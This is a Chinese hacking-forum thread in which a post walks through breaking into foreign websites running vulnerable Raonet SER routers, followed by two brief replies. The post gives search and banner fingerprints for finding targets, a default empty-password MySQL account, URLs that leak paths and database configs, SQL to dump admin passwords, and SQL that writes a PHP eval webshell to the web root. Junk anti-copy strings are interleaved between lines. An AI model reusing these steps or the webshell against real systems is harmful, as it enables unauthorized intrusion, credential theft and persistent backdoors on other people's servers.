中国网络渗透测试联盟
标题:
利用某路由器漏洞入侵国外站点
[打印本页]
作者:
admin
时间:
2012-12-10 10:30
标题:
利用某路由器漏洞入侵国外站点
寻找存在漏洞的路由器方法:
8 @/ ^3 l# ~+ b5 L8 t
" v( s6 b) m9 L" I1 i5 f
1:google搜索'Raonet Subscriber Ethernet Router'
. P) Y/ v6 j) q2 n- U
' a t& d9 \8 n! [( j8 u2 P4 s+ {
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
) \5 ~& D B6 P: U& F% f4 @
8 V+ l( @/ E" [1 @9 `! x# @: ?
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
b' F% i D& G/ {/ E2 G( W
. [) d E6 e# R2 N& X: g
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
* ?8 c3 `) T' R0 O3 d; E! w
# H3 X5 y+ ?" ]& V( X6 B
' l7 Y6 ~; g/ q
0 ]3 o- c! ^* T# C; d; m+ ?
入侵步骤:
# C$ Y; e* H* b; Z1 H+ q; q
$ w. _5 Y1 m1 P, R+ y
1.爆web路径,
http://www.yu1u.org/src/jpgraph_line.php
% r- U. x4 i$ ?, _( x0 X
+ z# _* V& C/ ~3 F7 Z! n# O
2:查看数据库配置文件,
http://www.yu1u.org/inc/conn_db.inc
% W5 ^, i# B# f
3:得到密码后连接,查看GUI管理密码:
+ M. b. w" Y8 ]+ q, z8 h4 R
use ser_500
1 f' g& w1 G R1 F1 q
select id,passwd from user;
: R5 D# b2 y3 b, y
4:通过数据库写入webshell,执行命令:
) x: i7 h- H( L5 h9 T+ e9 |8 ]
use mysql;
; Q& p2 B* \9 A* t! I* b0 j
create table ok(cmd TEXT);
- f8 p( N z$ L8 `
insert into ok values("<?php @eval($_POST[cmd])?>");
! x, X2 I" \: k' U6 h) @. r
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
# @7 B f/ I6 M8 f4 Z
drop table ok;
8 }' Q' e# S# G. G8 v. n
8 s3 B2 u& r0 a
5:连接后门shell.php
% _' E) K& h, B0 i
' b: e! f+ ^4 G4 H
6. 搞定!
7 Y1 a. ?% x4 I. k# ~
! x4 _8 z, M. ]/ a- w+ V" z
作者:
Anthony~
时间:
2013-7-27 20:06
这个后果可以很严重的说
作者:
jos666
时间:
2013-7-29 12:07
不错哦,黑服务器补洞。。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2